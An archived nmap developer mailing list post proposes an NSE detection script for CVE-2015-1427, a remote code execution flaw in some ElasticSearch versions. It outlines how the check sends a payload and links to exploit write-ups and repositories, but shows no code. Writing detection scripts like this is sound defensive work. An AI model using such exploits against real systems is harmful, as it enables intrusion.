[NSE] http-vuln-cve2015-1427 Remote Code Execution in Elastic Search

[Gyanendra Mishra <anomaly.the () gmail com>]

Hi,

I tried writing a script inspired by [1] and [2]. ElasticSearch versions
1.3.0 to 1.3.8 and 1.4.0 to 1.4.3 have a remote code execution
vulnerability as described in [1]. The script sends a simple post request
containing the payload as mentioned in [3],[2]. If the hits table inside
the hits table contains something then the script was successful and the
target is vulnerable. I tried running the curl command in [1] and [3] and
the script by XiphosResearch in [2] on various versions of ElasticSearch
(1.3.6,1.3.7,1.3.0,1.4.2) but I couldn't get the desired results. The
attached NSE script gets results exactly  as  the above mentioned
commands/script. So I couldn't run any successful tests. I have also added
a github link [4] to my script in case I make any changes to it.

[1]
jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
[2]
https://github.com/XiphosResearch/exploits/blob/master/ElasticSearch/elastic_shell.py
[3]
carnal0wnage.attackresearch.com/2015/03/elasticsearch-cve-2015-1427-rce-exploit.html
[4]
https://github.com/h4ck3rk3y/nmap/blob/master/test_scripts/http-vuln-cve2015-1427.nse

Gyanendra

Attachment: http-vuln-cve2015-1427.nse
Description:

_______________________________________________
Sent through the dev mailing list
https://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/